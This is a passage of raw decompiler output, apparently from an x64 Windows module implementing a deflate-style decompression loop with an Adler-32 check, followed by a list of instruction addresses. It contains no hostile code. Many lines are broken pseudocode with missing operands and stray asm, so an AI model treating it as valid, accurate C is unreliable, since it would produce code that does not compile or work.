				if (0xa == 0) goto 0xf30606cb;
				 *(_t1036 + 0x30) = _t940 >> 0xb;
				 *(_t1036 + 0x38) = _t393 - 0xb;
				if ((_t635 & 0x0000ffff) - 0x1d > 0) goto 0xf306013e;
				 *(_t1036 + 0x44) =  *(__rdi + 0xf311ef48) & 0x000000ff;
				 *(_t1036 + 0x3c) =  *(0xf311ef68 + __rdi * 2) & 0x0000ffff;
				_t540 =  ==  ? 0x1601 : 0x1001;
				r12d = 0x2101;
				r12d = r12d & 0x00003700;
				_t730 =  ==  ? 0x1601 : 0x1001;
				if (( ==  ? 0x1601 : 0x1001) == 0) goto 0xf305ffd4;
				goto 0xf3060485;
				r12d =  *(_t1036 + 0x7c);
				goto 0xf3060149;
				_t542 =  *(_t1036 + 0x38);
				_t505 =  *(_t1036 + 0x50);
				if (_t542 - 8 >= 0) goto 0xf3060565;
				if (__r15 == __r15) goto 0xf306019f;
				 *(_t1036 + 0x30) =  *(_t1036 + 0x30) | _t1016 << _t542;
				 *(_t1036 + 0x38) = _t542 + 8;
				_t1097 = __r15 + 1;
				goto 0xf30601a4;
				if ((bpl & 0x00000002) == 0) goto 0xf3060172;
				_t839 =  *((intOrPtr*)(_t1036 + 0x1a8));
				_t734 = __r8 - _t839;
				if (_t734 == 0) goto 0xf3061238;
				if (_t734 >= 0) goto 0xf3061284;
				 *((char*)(__r11 + __r8)) =  *(_t1036 + 0x3c);
				_t1039 = __r8 + 1;
				r12d = 0x11;
				r12d =  ==  ? 6 : r12d;
				 *(_t1036 + 0x40) =  *(_t1036 + 0x40) - 1;
				r12d =  ==  ? 6 : r12d;
				 *((long long*)(_t1036 + 0x70)) = __r13;
				r13d =  *(_t1036 + 0x3c);
				_t1018 =  *((intOrPtr*)(_t1036 + 0x1a8));
				if (_t1039 == _t1018) goto 0xf3060b97;
				_t900 = _t1018 - _t1039;
				_t1001 = _t1039;
				_t901 =  >=  ? _t839 : _t900;
				 *((long long*)(_t1036 + 0x28)) =  *(_t1036 + 0xb8);
				 *((long long*)(_t1036 + 0x20)) = _t901;
				_t1060 = _t1001;
				E000007FE7FEF30616A0();
				_t1066 =  *((intOrPtr*)(_t1036 + 0x58));
				_t1043 = _t1001 + _t901;
				r12b = 0xc;
				 *(_t1036 + 0x40) =  *(_t1036 + 0x40) - _t505;
				if (_t900 != _t839) goto 0xf3060208;
				_t1087 =  *((intOrPtr*)(_t1036 + 0x70));
				r12b = 3;
				if ( *((intOrPtr*)(_t1066 + 0x18)) == 0) goto 0xf305f43b;
				_t544 =  *(_t1036 + 0x38);
				_t986 =  *((intOrPtr*)(_t1036 + 0xe0));
				_t682 =  >=  ? r14d : _t544 >> 3;
				_t506 = _t1018 * 8;
				_t400 = (_t544 & 0xfffffff8) - _t506;
				 *(_t1036 + 0x38) = _t400;
				_t1100 = _t1097 - __r15 + _t986 - _t1018;
				if (_t1100 - _t986 > 0) goto 0xf30613c7;
				_t1101 = _t1100 + _t1087;
				 *(_t1036 + 0x30) =  !(0xffffffff << (_t400 & 0x00000038)) &  *(_t1036 + 0x30) >> (_t544 & 0x00000007);
				r12b = 0x18;
				if (( *(_t1036 + 0x1b8) & 0x00000001) == 0) goto 0xf305f43b;
				 *(_t1036 + 0x40) = 0;
				r12b = 0x17;
				_t548 =  *(_t1036 + 0x40) & 0x000001ff;
				 *(_t1036 + 0x40) = _t548;
				r12b = 0x14;
				if (_t548 == 0x100) goto 0xf305f43b;
				r12b = 0x20;
				if (_t548 - 0x11d > 0) goto 0xf305f43b;
				_t549 =  *(_t839 + 0xf311eee8) & 0x000000ff;
				_t744 = _t549;
				r12b = _t744 == 0;
				 *(_t1036 + 0x44) = _t549;
				 *(_t1036 + 0x40) =  *(0xf311ef08 + _t839 * 2) & 0x0000ffff;
				r12b = r12b | 0x0000000e;
				r9d =  *(_t1036 + 0x3c);
				if (_t744 >= 0) goto 0xf3060382;
				r12b = 0x1d;
				if ( *((intOrPtr*)(_t1036 + 0xf4)) != 0) goto 0xf305f43b;
				_t1002 = _t1043 + 0xf311ef08;
				_t948 =  *((intOrPtr*)(_t1036 + 0x1a8));
				_t746 = _t1002 - _t948;
				if (_t746 > 0) goto 0xf30603b1;
				_t843 = (_t1043 - _t1060 &  *(_t1036 + 0xb8)) - _t1043;
				if (_t746 < 0) goto 0xf3060a9a;
				if (_t843 - 0xf311ef08 >= 0) goto 0xf3060a9a;
				r12d = 0x13;
				r12d =  ==  ? 0xc : r12d;
				_t408 =  *(_t1036 + 0x40);
				_t640 =  *(_t1036 + 0x50);
				if (_t408 - 3 > 0) goto 0xf3060605;
				_t551 =  *(_t1036 + 0x38);
				if (_t551 == 0) goto 0xf3060421;
				_t1023 = _t1101;
				if (_t551 - 8 >= 0) goto 0xf3060436;
				if (_t1023 == __r15) goto 0xf3060413;
				_t903 =  *(_t1036 + 0x30) | _t948 << _t551;
				 *(_t1036 + 0x30) = _t903;
				 *(_t1036 + 0x38) = _t551 + 8;
				r12d = 0;
				goto 0xf3060419;
				r12d = _t640;
				if ((r12b & 0x00000002) == 0) goto 0xf30603e8;
				goto 0xf306046a;
				if (_t1023 + 1 == __r15) goto 0xf3060464;
				goto 0xf3060453;
				_t951 = _t903 >> 8;
				 *(_t1036 + 0x30) = _t951;
				 *(_t1036 + 0x38) = ( *(_t1066 + 0x14) << 8) + 0xfffffff8;
				_t612 =  *(_t1066 + 0x14) << 8;
				_t557 = _t506 & 0x000000ff | _t612;
				 *(_t1066 + 0x14) = _t557;
				 *(_t1036 + 0x40) = _t408 + 1;
				r12d = 0;
				goto 0xf306046a;
				r12d = _t640;
				if (r12b == 0) goto 0xf30603cf;
				if ((r12b & 0xffffffff) == 1) goto 0xf30606d0;
				goto 0xf3060c1b;
				_t411 = _t557 & 0x000000ff;
				if (_t411 == 1) goto 0xf30606d0;
				goto 0xf3060c27;
				_t684 =  !_t682 & _t612;
				_t952 = _t951 >> _t411;
				 *(_t1036 + 0x30) = _t952;
				 *(_t1036 + 0x38) = _t506;
				 *(_t1036 + 0x40) =  *(_t1036 + 0x40) + _t684;
				r12b = 0xf;
				goto 0xf305f43b;
				 *(_t1036 + 0x30) = _t952 >> _t411;
				 *(_t1036 + 0x38) = _t506;
				 *(_t1036 + 0x3c) =  *(_t1036 + 0x3c) + ( !_t684 & _t612);
				r12b = 0x16;
				goto 0xf305f43b;
				 *(_t1036 + 0x30) = _t903 >> _t411;
				 *(_t1036 + 0x38) = _t640;
				 *(_t1036 + 0x80) = _t843;
				 *(_t1036 + 0x88) = _t843;
				 *((long long*)(_t1036 + 0x90)) = 0xb;
				_t561 =  *(_t1036 + 0x3c);
				_t844 = _t843 & 0xf311ef08;
				if (3 == 3) goto 0xf30612f1;
				if (_t561 != 0x10) goto 0xf30606d9;
				if (_t1002 - 1 - 0x1c9 >= 0) goto 0xf3061307;
				goto 0xf30606db;
				 *(_t1036 + 0x30) = _t844 >> 8;
				 *(_t1036 + 0x38) = _t561 + 0xfffffff8;
				 *(_t1036 + 0x3c) = 3;
				r12b = 0x12;
				goto 0xf305f43b;
				_t414 =  *(_t1066 + 0x291d) & 0x0000ffff;
				 *(_t1036 + 0x40) = _t414;
				r12b = 0x1e;
				if (_t414 != 0x2101) goto 0xf305f43b;
				r12b = 0x14;
				if (_t414 == 0) goto 0xf305f43b;
				r12d = 0x11;
				r12d =  ==  ? 6 : r12d;
				goto 0xf305f43b;
				r8d = 0x120;
				_t925 =  *((intOrPtr*)(_t1036 + 0x128));
				E000007FE7FEF30F24C0();
				_t1067 =  *((intOrPtr*)(_t1036 + 0x58));
				 *(_t1036 + 0x40) = 0;
				r12b = 9;
				goto 0xf305f43b;
				r12b = 0x18;
				goto 0xf305f43b;
				if (_t844 - 0xf >= 0) goto 0xf3060746;
				r9d =  *(_t1036 + 0x6c);
				if (_t925 - 1 > 0) goto 0xf3060acc;
				_t565 =  *(_t1036 + 0x38);
				_t419 =  *((short*)(_t1067 + 0x3c + _t844 * 2));
				if (_t419 < 0) goto 0xf3060659;
				if ((_t419 & 0x0000ffff) - 0x200 < 0) goto 0xf3060699;
				_t420 = _t419 >> 9;
				if (_t565 - _t420 < 0) goto 0xf3060699;
				goto 0xf3060aec;
				if (_t565 - 0xb < 0) goto 0xf3060699;
				asm("dec eax");
				asm("adc eax, 0x0");
				if ( !_t420 - 0x23f > 0) goto 0xf3061218;
				_t422 =  *((short*)(_t1067 + 0x83c + _t844 * 2));
				if (_t422 >= 0) goto 0xf3060690;
				if (_t565 - 0xc >= 0) goto 0xf3060663;
				if (_t422 >= 0) goto 0xf3060aec;
				if (__r15 == __r15) goto 0xf3061245;
				_t1105 = __r15 + 1;
				 *(_t1036 + 0x30) =  *(_t1036 + 0x30) | _t844 << _t565;
				 *(_t1036 + 0x38) = _t925 + 8;
				_t775 = _t565 - 6;
				if (_t775 <= 0) goto 0xf3060631;
				goto 0xf3060aee;
				r12w = 0x2200;
				r12d = r12d >> 8;
				goto 0xf305f43b;
				_t988 =  *((intOrPtr*)(_t1036 + 0x80 + _t844 * 8)) + (_t903 & 0xffffffff);
				if (_t775 < 0) goto 0xf30613e0;
				if (_t988 + _t1002 - 0x1c9 > 0) goto 0xf30613f4;
				if (_t988 == 0) goto 0xf3060718;
				E000007FE7FEF30F24C0();
				 *(_t1036 + 0x40) =  *(_t1036 + 0x40) + _t640;
				r12b = 0xa;
				_t1068 =  *((intOrPtr*)(_t1036 + 0x58));
				_t1076 =  *((intOrPtr*)(_t1036 + 0x1a0));
				_t1046 =  *((intOrPtr*)(_t1036 + 0x70));
				goto 0xf305f43b;
				r12b = 0x1a;
				goto 0xf305f43b;
				r12b = 0x22;
				goto 0xf305f43b;
				goto 0xf3060aee;
				_t657 =  *(_t1036 + 0x38);
				 *(_t1036 + 0x68) =  *(_t1036 + 0x3c);
				r9d =  *(_t1036 + 0x44);
				_t850 = __r15 - _t1105;
				r12b = 0xc;
				if (_t850 - 0xe < 0) goto 0xf3060b66;
				if (_t657 - 0x1d > 0) goto 0xf3060794;
				_t851 = _t850 << _t657;
				_t1106 = _t1105 + 4;
				_t568 =  *((short*)(_t1068 + 0x3c + _t851 * 2));
				if (_t568 < 0) goto 0xf30607bc;
				if (0x2101 - 0x200 < 0) goto 0xf30611d8;
				goto 0xf30607e8;
				asm("dec eax");
				asm("adc ecx, 0x0");
				if ( !_t568 - 0x23f > 0) goto 0xf306126f;
				_t783 =  *((short*)(_t1068 + 0x83c +  &(( *(_t1036 + 0xe8))[_t1002]) * 2));
				if (_t783 < 0) goto 0xf30607c1;
				asm("bt ebp, 0x8");
				if (_t783 < 0) goto 0xf30608a8;
				_t436 =  *((short*)(_t1068 + 0x3c + _t851 * 2));
				if (_t436 < 0) goto 0xf3060820;
				if ((_t436 & 0x0000ffff) - 0x200 < 0) goto 0xf30611d8;
				goto 0xf306084b;
				asm("dec eax");
				asm("adc eax, 0x0");
				if ( !_t436 - 0x23f > 0) goto 0xf306127b;
				_t438 =  *((short*)(_t1068 + 0x83c + _t851 * 2));
				if (_t438 < 0) goto 0xf3060825;
				_t439 = _t438 & 0x0000ffff;
				_t788 = _t1046 -  *((intOrPtr*)(_t1036 + 0x1a8));
				if (_t788 >= 0) goto 0xf3061284;
				_t660 = _t657 + 0x20;
				 *(_t1076 + _t1046) = bpl;
				_t927 = _t1046 + 1;
				asm("bt eax, 0x8");
				if (_t788 < 0) goto 0xf30608a3;
				_t961 =  *((intOrPtr*)(_t1036 + 0x1a8));
				if (_t927 - _t961 >= 0) goto 0xf30612a2;
				 *(_t1076 + _t1046 + 1) = _t439;
				if (_t961 - _t1046 + 2 - 0x103 < 0) goto 0xf3060b66;
				goto 0xf3060773;
				_t1048 = _t927;
				_t441 = _t439 & 0x000001ff;
				if (_t441 == 0x100) goto 0xf3060b5e;
				if (_t441 - 0x11d > 0) goto 0xf3061298;
				if (_t660 - 0x1d > 0) goto 0xf30608ec;
				if (__r15 - _t1106 - 3 <= 0) goto 0xf306140a;
				_t1107 = _t1106 + 4;
				r9d =  *0x7FEF311EEE7 & 0x000000ff;
				if (r9b == 0) goto 0xf306092b;
				_t449 =  *((short*)(_t1068 + 0xdda));
				if (_t449 < 0) goto 0xf3060955;
				if ((_t449 & 0x0000ffff) - 0x200 < 0) goto 0xf30611d8;
				goto 0xf3060980;
				asm("dec eax");
				asm("adc eax, 0x0");
				if ( !_t449 - 0x23f > 0) goto 0xf306127b;
				_t451 =  *((short*)(_t1068 + 0x15da));
				if (_t451 < 0) goto 0xf306095a;
				_t663 = _t660 + 0x20 - r9d - 0xb;
				if ((_t451 & 0x1ff) - 0x1d > 0) goto 0xf30612ae;
				r9d =  *0x7FEF311EF47 & 0x000000ff;
				 *(_t1036 + 0x68) =  *0x7FEF311EF66 & 0x0000ffff;
				 *((long long*)(_t1036 + 0x118)) = _t1060;
				if (r9d == 0) goto 0xf3060a01;
				if (_t663 - 0x1d > 0) goto 0xf30609e2;
				if (__r15 - _t1107 - 3 <= 0) goto 0xf306140a;
				_t997 = ((( *(_t1036 + 0x30) | _t851) >> 0x0000000a >> 0xb | __r15 - _t1106 << _t660) >> r9d >> 0xb | 0xffffffff << r9d << _t663) >> r9d;
				_t665 = _t663 + 0x20 - r9d;
				 *(_t1036 + 0x68) = ( !( *_t1107) & _t640) +  *(_t1036 + 0x68);
				r9d =  *(_t1036 + 0x68);
				if (_t1048 - _t1060 >= 0) goto 0xf3060a19;
				if ( *((intOrPtr*)(_t1036 + 0xf4)) != 0) goto 0xf30612b6;
				 *((long long*)(_t1036 + 0x70)) = _t1087;
				 *((long long*)(_t1036 + 0x120)) = 0xf311ef68;
				 *((long long*)(_t1036 + 0x28)) =  *(_t1036 + 0xb8);
				 *((long long*)(_t1036 + 0x20)) = 0xf311ef68;
				_t930 = _t1076;
				_t966 =  *((intOrPtr*)(_t1036 + 0x1a8));
				E000007FE7FEF306148C(_t930, _t966, _t1048, _t1060);
				if ( *((intOrPtr*)(_t1036 + 0x1a8)) - _t1048 +  *((intOrPtr*)(_t1036 + 0x120)) - 0x103 >= 0) goto 0xf306076a;
				goto 0xf3060b66;
				 *(_t1036 + 0x40) = _t665;
				goto 0xf305f43b;
				_t867 =  *(_t1036 + 0xb8);
				 *((long long*)(_t1036 + 0x28)) = _t867;
				 *((long long*)(_t1036 + 0x20)) = _t930;
				_t931 =  *((intOrPtr*)(_t1036 + 0x1a0));
				_t460 = E000007FE7FEF306148C(_t931, _t966, _t930,  *((intOrPtr*)(_t1036 + 0x118)));
				_t1070 =  *((intOrPtr*)(_t1036 + 0x58));
				r12b = 0xc;
				goto 0xf305f43b;
				_t587 = _t460;
				_t968 = _t966 << _t587 |  *(_t1036 + 0x30);
				 *(_t1036 + 0x30) = _t968;
				 *(_t1036 + 0x38) = _t460 + 0x10;
				goto 0xf3060aee;
				_t641 =  *((short*)(_t1070 + 0x3c + _t931 * 2));
				if (_t641 < 0) goto 0xf3060b0d;
				goto 0xf3060b39;
				asm("dec eax");
				asm("adc edi, 0x0");
				if ( !(_t641 & 0x000001ff) - 0x23f > 0) goto 0xf30611c7;
				_t644 =  *((short*)(_t1070 + 0x83c + _t997 * 2));
				if (_t644 < 0) goto 0xf3060b12;
				r12b = 0x22;
				if (0xa == 0) goto 0xf305f43b;
				 *(_t1036 + 0x30) = _t968 >> 0xb;
				 *(_t1036 + 0x38) = _t587 - 0xb;
				 *(_t1036 + 0x40) = _t644 & 0x0000ffff;
				r12b = 0xd;
				goto 0xf305f43b;
				r12b = 0x14;
				 *(_t1036 + 0x30) = _t997;
				 *(_t1036 + 0x38) = _t665;
				 *(_t1036 + 0x3c) =  *(_t1036 + 0x68);
				 *(_t1036 + 0x40) = 0x100;
				 *(_t1036 + 0x44) = r9d;
				goto 0xf305f43b;
				 *((char*)(_t931 + 8)) = 0xfd;
				 *_t931 = _t867;
				 *((long long*)(_t931 + 0x10)) = _t867;
				goto 0xf3061193;
				r12b = 0x13;
				goto 0xf3060c5a;
				r12d = r12d >> 8;
				r9d = r12d;
				r12b = 2;
				_t1071 =  *((intOrPtr*)(_t1036 + 0x58));
				goto 0xf3060c14;
				r12d = r12d >> 8;
				r9d = r12d;
				r12b = 3;
				goto 0xf3060c31;
				r12d = r12d >> 8;
				r9d = r12d;
				r12b = 9;
				goto 0xf3060c31;
				r12b = 0xe;
				goto 0xf3060bdb;
				r12b = 0x10;
				r9d = 2 >> 8 >> 8;
				goto 0xf3060c31;
				r12b = 0xb;
				goto 0xf3060bee;
				r12b = 0x11;
				r9d = 0x100 >> 8 >> 8;
				goto 0xf3060c31;
				r12d = r12d >> 8;
				r9d = r12d;
				r12b = 0xa;
				goto 0xf3060c31;
				r12d = r12d >> 8;
				r9d = r12d;
				r12b = 5;
				goto 0xf3060c31;
				r9d = r12d;
				r12b = 8;
				goto 0xf3060c34;
				r12d = r12d >> 8;
				r9d = r12d;
				r12b = 0x17;
				goto 0xf3060c31;
				r12d = r12d >> 8;
				r9d = r12d;
				r12b = 0xf;
				if (r9b == 1) goto 0xf3060c9a;
				_t466 = r9b & 0xffffffff;
				if (_t466 == 0xfc) goto 0xf3060cbe;
				_t594 =  *(_t1036 + 0x38);
				_t648 =  >=  ? _t466 - r15d + r14d : _t594 >> 3;
				_t469 = _t997 * 8;
				 *(_t1036 + 0x38) = _t594 - _t469;
				_t1005 =  &(_t1107[1]);
				_t1034 =  *((intOrPtr*)(_t1036 + 0x1b0));
				goto 0xf3060cc0;
				_t932 =  *((intOrPtr*)(_t1036 + 0x1a8));
				if ( *((intOrPtr*)(_t1036 + 0x70)) != _t932) goto 0xf3060cbb;
				r9b = 2;
				r9b = r9b - (_t469 & 0xffffff00 | r12b == 0x00000017);
				_t1055 = _t932;
				goto 0xf3060cc0;
				r9b = 1;
				 *(_t1071 + 0x291c) = r12b;
				_t596 =  *(_t1036 + 0x38);
				 *(_t1071 + 8) = _t596;
				 *(_t1071 + 0x24) =  *(_t1036 + 0x3c);
				 *(_t1071 + 0x28) =  *(_t1036 + 0x40);
				 *(_t1071 + 0x2c) =  *(_t1036 + 0x44);
				 *_t1071 =  !(0xffffffff << _t596) &  *(_t1036 + 0x30);
				_t816 =  *(_t1036 + 0x1b8) & 0x00000040;
				if (_t816 != 0) goto 0xf3061169;
				if (_t816 == 0) goto 0xf3061169;
				_t817 = r9b;
				if (_t817 < 0) goto 0xf3061169;
				_t907 = _t1055 - _t1034;
				if (_t817 < 0) goto 0xf306137a;
				 *(_t1036 + 0xb8) = _t997;
				 *(_t1036 + 0x6c) = r9d;
				if (_t1055 -  *((intOrPtr*)(_t1036 + 0x1a8)) > 0) goto 0xf3061389;
				_t473 =  *(_t1071 + 0x20);
				_t1079 =  *((intOrPtr*)(_t1036 + 0x1a0)) + _t1034;
				_t651 = _t473 & 0x0000ffff;
				asm("xorps xmm0, xmm0");
				asm("movaps [esp+0xc0], xmm0");
				asm("movaps [esp+0xa0], xmm0");
				_t934 = _t907 & 0xfffffffc;
				 *(_t1036 + 0xf8) = _t907;
				 *(_t1036 + 0x108) = _t907;
				_t876 = _t934 - 0x3f51f0dfc0;
				 *(_t1036 + 0x50) = _t876;
				r12d = 0x56c0;
				 *(_t1036 + 0xe8) = _t1079;
				 *(_t1036 + 0xd8) = _t1005;
				 *(_t1036 + 0x7c) = _t651;
				 *(_t1036 + 0x100) = _t934;
				if (0x3f51f0dfc0 - __r12 < 0) goto 0xf3060efe;
				r11d = _t651 * 0x56c0;
				_t1090 = _t1079;
				 *(_t1036 + 0x80) =  *_t1090 & 0x000000ff;
				 *(_t1036 + 0x84) = _t1090[1] & 0x000000ff;
				 *(_t1036 + 0x88) = _t1090[2] & 0x000000ff;
				 *(_t1036 + 0x8c) = _t1090[3] & 0x000000ff;
				r10d = 0;
				 *((intOrPtr*)(_t1036 + 0xc0 + _t1071 * 4)) =  *((intOrPtr*)(_t1036 + 0xc0 + _t1071 * 4)) +  *((intOrPtr*)(_t1036 + 0x80 + _t1071 * 4));
				_t281 = _t1071 + 1; // 0x1
				if (_t281 != 4) goto 0xf3060e1d;
				asm("movaps xmm0, [esp+0xc0]");
				asm("movaps [esp+0x80], xmm0");
				 *((intOrPtr*)(_t1036 + 0xa0 + _t1005 * 4)) =  *((intOrPtr*)(_t1036 + 0xa0 + _t1005 * 4)) +  *((intOrPtr*)(_t1036 + 0x80 + _t1005 * 4));
				_t291 = _t1005 + 1; // 0x1
				_t821 = _t291 - 4;
				if (_t821 != 0) goto 0xf3060e4c;
				_t877 = _t876 + 0xfffffffc;
				if (_t821 != 0) goto 0xf3060dea;
				_t515 =  *(_t1036 + 0xc0 + _t877 * 4);
				 *(_t1036 + 0xc0 + _t877 * 4) = _t515;
				_t298 = _t877 + 1; // 0x1
				_t908 = _t298;
				_t878 = _t908;
				if (_t908 != 4) goto 0xf3060e77;
				 *((intOrPtr*)(_t1036 + 0xa0 + _t878 * 4)) =  *((intOrPtr*)(_t1036 + 0xa0 + _t878 * 4)) - _t515 * 0xfff1;
				_t305 = _t878 + 1; // 0x1
				if (_t305 != 4) goto 0xf3060ea7;
				_t882 = _t1034 * _t934 >> 0x2f;
				_t824 = 0x3f51f08900 - __r12;
				if (_t824 >= 0) goto 0xf3060de2;
				_t1113 =  *(_t1036 + 0x108);
				r14d = r14d & 0x00000003;
				_t1058 =  *((intOrPtr*)(_t1036 + 0x58));
				r10d =  *(_t1036 + 0x1b8);
				_t1010 =  *(_t1036 + 0xe8);
				r12d =  *(_t1036 + 0x7c);
				if (_t824 == 0) goto 0xf3060fc8;
				_t1063 = 0x3f51f0dfc0 + _t1010;
				 *(_t1036 + 0x80) =  *_t1063 & 0x000000ff;
				 *(_t1036 + 0x84) = _t1063[1] & 0x000000ff;
				 *(_t1036 + 0x88) = _t1063[2] & 0x000000ff;
				 *(_t1036 + 0x8c) = _t1063[3] & 0x000000ff;
				 *((intOrPtr*)(_t1036 + 0xc0 + _t882 * 4)) =  *((intOrPtr*)(_t1036 + 0xc0 + _t882 * 4)) +  *((intOrPtr*)(_t1036 + 0x80 + _t882 * 4));
				_t329 = _t882 + 1; // 0x1
				_t975 = _t329;
				_t883 = _t975;
				if (_t975 != 4) goto 0xf3060f72;
				asm("movaps xmm0, [esp+0xc0]");
				asm("movaps [esp+0x80], xmm0");
				_t625 =  *(_t1036 + 0x80 + _t883 * 4);
				 *((intOrPtr*)(_t1036 + 0xa0 + _t883 * 4)) =  *((intOrPtr*)(_t1036 + 0xa0 + _t883 * 4)) + _t625;
				_t339 = _t883 + 1; // 0x1
				_t976 = _t339;
				_t884 = _t976;
				_t826 = _t976 - 4;
				if (_t826 != 0) goto 0xf3060f9f;
				if (_t826 != 0) goto 0xf3060f41;
				_t626 = _t625 * 0xfff1;
				 *((intOrPtr*)(_t1036 + 0xc0 + _t884 * 4)) =  *((intOrPtr*)(_t1036 + 0xc0 + _t884 * 4)) - _t626;
				_t347 = _t884 + 1; // 0x1
				_t980 = _t347;
				_t885 = _t980;
				if (_t980 != 4) goto 0xf3060fd7;
				r9d =  *(_t1036 + 0x6c);
				 *((intOrPtr*)(_t1036 + 0xa0 + _t885 * 4)) =  *((intOrPtr*)(_t1036 + 0xa0 + _t885 * 4)) - _t626 * 0xfff1;
				_t356 = _t885 + 1; // 0x1
				_t984 = _t356;
				_t886 = _t984;
				if (_t984 != 4) goto 0xf3061019;
				 *(_t1036 + 0xa0 + _t886 * 4) =  *(_t1036 + 0xa0 + _t886 * 4) << 2;
				_t887 = _t886 + 1;
				if (_t887 != 4) goto 0xf3061051;
				 *((intOrPtr*)(_t1036 + 0xa4)) =  *((intOrPtr*)(_t1036 + 0xa4)) -  *((intOrPtr*)(_t1036 + 0xc4)) + 0xfff1;
				 *((intOrPtr*)(_t1036 + 0xa8)) =  ~( *((intOrPtr*)(_t1036 + 0xc8)) +  *((intOrPtr*)(_t1036 + 0xc8))) +  *((intOrPtr*)(_t1036 + 0xa8)) + 0x1ffe2;
				 *((intOrPtr*)(_t1036 + 0xac)) =  *((intOrPtr*)(_t1036 + 0xac)) + _t984 + _t984 * 2;
				_t888 = _t887 + 1;
				if (_t888 != 4) goto 0xf30610b4;
				r12d = r12d *  *(_t1036 + 0x50);
				_t890 = _t888 * _t1034 >> 0x2f;
				_t891 = _t890 + 1;
				if (_t891 != 4) goto 0xf30610e4;
				if (_t1113 == 0) goto 0xf306110b;
				_t606 = r12d +  *((intOrPtr*)(_t1036 + 0xc0 + _t887 * 4)) + ( *(_t1010 +  *(_t1036 + 0x100) + _t891) & 0x000000ff);
				_t708 = (_t473 >> 0x10) + r11d + r12d - 0x800000007961 +  *((intOrPtr*)(_t1036 + 0xa0 + _t890 * 4)) + _t606;
				if (_t1113 != _t891 + 1) goto 0xf30610fb;
				_t502 = _t708 * 0xfff1;
				_t711 = _t708 - _t502 << 0x00000010 | _t606 - _t606 * 0x0000fff1;
				 *(_t1058 + 0x20) = _t711;
				_t834 = r9b;
				if (_t834 != 0) goto 0xf30611a7;
				r10d = r10d & 0x00000001;
				if (_t834 == 0) goto 0xf306117f;
				r9b = _t711 ==  *((intOrPtr*)(_t1058 + 0x14));
				r9b = r9b + r9b;
				r9b = r9b + 0xfe;
				goto 0xf306117f;
				_t898 =  *((intOrPtr*)(_t1036 + 0x110));
				 *(_t898 + 8) = r9b;
				 *_t898 =  *((intOrPtr*)(_t1036 + 0xe0)) -  *(_t1036 + 0xb8) + __r15 +  *(_t1036 + 0xd8);
				 *((long long*)(_t898 + 0x10)) = _t1058 - _t1034;
				return _t502;
			}

0x7fef305ffc7
0x7fef305ffd7
0x7fef305ffe0
0x7fef305ffe7
0x7fef305fff5
0x7fef3060000
0x7fef306000b
0x7fef306000d
0x7fef3060012
0x7fef3060014
0x7fef306001c
0x7fef3060028
0x7fef306002c
0x7fef3060035
0x7fef306003b
0x7fef3060046
0x7fef306004f
0x7fef3060054
0x7fef3060059
0x7fef3060068
0x7fef306006b
0x7fef306006e
0x7fef3060073
0x7fef3060076
0x7fef306007d
0x7fef3060083
0x7fef306008f
0x7fef3060092
0x7fef3060095
0x7fef306009a
0x7fef306009d
0x7fef30600a9
0x7fef30600b4
0x7fef30600c1
0x7fef30600ca
0x7fef30600ce
0x7fef30600d7
0x7fef30600dd
0x7fef30600ea
0x7fef30600f1
0x7fef30600fa
0x7fef3060101
0x7fef306010c
0x7fef306011e
0x7fef306012d
0x7fef306013b
0x7fef306013e
0x7fef3060142
0x7fef3060149
0x7fef306014b
0x7fef3060151
0x7fef3060159
0x7fef3060160
0x7fef3060167
0x7fef306016e
0x7fef3060175
0x7fef306017e
0x7fef306018c
0x7fef3060194
0x7fef306019a
0x7fef306019d
0x7fef30601a8
0x7fef30601af
0x7fef30601b7
0x7fef30601ba
0x7fef30601c0
0x7fef30601ca
0x7fef30601ce
0x7fef30601db
0x7fef30601e1
0x7fef30601e5
0x7fef30601e9
0x7fef30601f2
0x7fef30601f7
0x7fef3060200
0x7fef306020b
0x7fef3060214
0x7fef3060217
0x7fef306022d
0x7fef3060231
0x7fef3060236
0x7fef3060241
0x7fef3060244
0x7fef3060254
0x7fef3060259
0x7fef306025c
0x7fef3060261
0x7fef3060265
0x7fef3060267
0x7fef3060271
0x7fef3060279
0x7fef3060284
0x7fef3060290
0x7fef30602a3
0x7fef30602a7
0x7fef30602ae
0x7fef30602b0
0x7fef30602b4
0x7fef30602ba
0x7fef30602c6
0x7fef30602dd
0x7fef30602e2
0x7fef30602ee
0x7fef30602f4
0x7fef30602fc
0x7fef306030a
0x7fef3060310
0x7fef3060314
0x7fef306031d
0x7fef3060323
0x7fef306032c
0x7fef306033e
0x7fef3060342
0x7fef3060344
0x7fef3060348
0x7fef3060357
0x7fef306035b
0x7fef3060364
0x7fef306036f
0x7fef3060371
0x7fef306037c
0x7fef3060386
0x7fef306038a
0x7fef3060392
0x7fef3060395
0x7fef306039f
0x7fef30603a2
0x7fef30603ab
0x7fef30603b8
0x7fef30603be
0x7fef30603c7
0x7fef30603cb
0x7fef30603d2
0x7fef30603d8
0x7fef30603de
0x7fef30603e5
0x7fef30603eb
0x7fef30603f0
0x7fef30603fc
0x7fef30603ff
0x7fef3060407
0x7fef306040b
0x7fef3060411
0x7fef3060416
0x7fef306041d
0x7fef306041f
0x7fef3060424
0x7fef3060434
0x7fef3060439
0x7fef306043d
0x7fef3060445
0x7fef306044d
0x7fef3060453
0x7fef3060455
0x7fef306045b
0x7fef306045f
0x7fef3060462
0x7fef3060467
0x7fef306046d
0x7fef306047a
0x7fef3060480
0x7fef3060485
0x7fef306048b
0x7fef3060491
0x7fef30604a4
0x7fef30604a6
0x7fef30604a9
0x7fef30604ae
0x7fef30604b2
0x7fef30604b6
0x7fef30604b9
0x7fef30604d1
0x7fef30604d6
0x7fef30604da
0x7fef30604de
0x7fef30604e1
0x7fef30604f8
0x7fef30604fd
0x7fef3060506
0x7fef306050e
0x7fef3060516
0x7fef3060522
0x7fef3060526
0x7fef306052c
0x7fef3060541
0x7fef3060552
0x7fef3060560
0x7fef306056c
0x7fef3060574
0x7fef306057b
0x7fef306057f
0x7fef3060582
0x7fef3060587
0x7fef3060599
0x7fef306059d
0x7fef30605a3
0x7fef30605a9
0x7fef30605af
0x7fef30605bf
0x7fef30605c5
0x7fef30605c9
0x7fef30605ce
0x7fef30605d4
0x7fef30605de
0x7fef30605eb
0x7fef30605f0
0x7fef30605f8
0x7fef3060600
0x7fef3060605
0x7fef3060608
0x7fef3060615
0x7fef306061f
0x7fef3060624
0x7fef306062f
0x7fef3060638
0x7fef3060640
0x7fef306064b
0x7fef306064d
0x7fef3060652
0x7fef3060654
0x7fef306065c
0x7fef3060668
0x7fef306066c
0x7fef3060674
0x7fef306067a
0x7fef3060685
0x7fef306068e
0x7fef3060693
0x7fef306069c
0x7fef30606a9
